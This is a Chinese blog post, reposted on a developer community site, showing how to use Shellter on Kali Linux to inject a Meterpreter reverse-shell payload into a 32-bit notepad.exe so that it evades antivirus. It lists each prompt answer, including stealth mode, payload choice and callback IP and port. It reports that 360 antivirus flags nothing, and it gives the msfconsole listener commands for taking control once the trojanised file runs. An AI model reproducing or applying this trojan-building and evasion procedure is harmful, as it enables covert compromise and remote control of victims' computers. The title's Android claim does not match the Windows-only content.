前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >kali制作安卓免杀木马_kali工具绑捆

kali制作安卓免杀木马_kali工具绑捆

作者头像
全栈程序员站长
发布2022-09-24 10:56:11
4K0
发布2022-09-24 10:56:11
举报

大家好,又见面了,我是你们的朋友全栈君。

Shellter 是一款动态 shellcode 注入工具,我们可以将shellcode注入到其它程序上,从而来躲避杀毒软件的查杀。俗称为免杀

官网:https://www.shellterproject.com/ 目前最新版本是7.2,主程序是.exe文件所以在windows下可以直接使用,在linux上运行的话

就需要安装wine环境来运行。我使用的Kali Linux 版本是kali-linux-2020.2目前最新版本 注意的是shellter目前只能注入32位的可执行文件

开始安装:

1. apt-get update //更新一下

2. apt-get install shellter //直接apt在线安装

2cf997912ae6ba280bd276e2bba1e73d.png
2cf997912ae6ba280bd276e2bba1e73d.png

安装完成后 ,终端直接输入shellter打开会报错,根据提示 我们直接执行命令dpkg –add-architecture i386 && apt-get update && apt-get install wine32

确认安装即可

dbbaa80f6bcace559af50ac265e88579.png
dbbaa80f6bcace559af50ac265e88579.png
fe835f16b8d2923e58ebd0784ebdb5ad.png
fe835f16b8d2923e58ebd0784ebdb5ad.png

现在我们打开shellter就可以打开运行了,工具安装完成后再/usr/share/windows-resources/shellter 这个文件夹

shellter目录下的Shellter_Backups文件夹是你注入文件后备份的文件夹,会自动把原文件备份一个到这个文件夹下。

免杀实验:

746dbb965fa47e64be08373d213265e9.png
746dbb965fa47e64be08373d213265e9.png

Choose Operation Mode – Auto/Manual (A/M/H):A //选择模式 A 自动模式自动注入后门,M高级模式,H帮助

PE Target:/home/notepad.exe // 注入的程序 这里已windows系统自带的32位记事本程序举例

d4ef33a085785f1595bc9750903dabbf.png
d4ef33a085785f1595bc9750903dabbf.png

Enable Stealth Mode? (Y/N/H): Y //是否启用隐身模式 输入Y启用

Use a listed payload or custom? (L/C/H): L //使用攻击模块列表或者自定义? 输入L 选择Payload

Select payload by index: 1 //选择第一个

0a0edb316253a2bfb5f1f0eefc512616.png
0a0edb316253a2bfb5f1f0eefc512616.png

SET LHOST: 192.168.37.137 //设置反弹回来的IP 本机

SET LPORT:4444 //设置接收反弹的端口

7e5c54b6fdfefc1d5cd2cc612ccc3b5b.png
7e5c54b6fdfefc1d5cd2cc612ccc3b5b.png

这样我们的木马后门shellcode就注入到这个文件里去了,

57c34f7ae82ad605a38b17fda5a69606.gif
57c34f7ae82ad605a38b17fda5a69606.gif

开启360全部查杀引擎,更新病毒库,查杀一下试试效果,没有任何提示。

023e934691bfc76e8796f7c7d546e60b.png
023e934691bfc76e8796f7c7d546e60b.png

打开msf,进行配置,

msfconsole

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost192.168.37.137set lport4444exploit //监听

这时运行带有后门的notepad.exe文件后,控制端成功连接上来,接下来就可以随意操作了。

发布者:全栈程序员栈长,转载请注明出处:https://javaforall.cn/171282.html原文链接:https://javaforall.cn

本文参与 腾讯云自媒体同步曝光计划,分享自作者个人站点/博客。
如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 作者个人站点/博客 前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档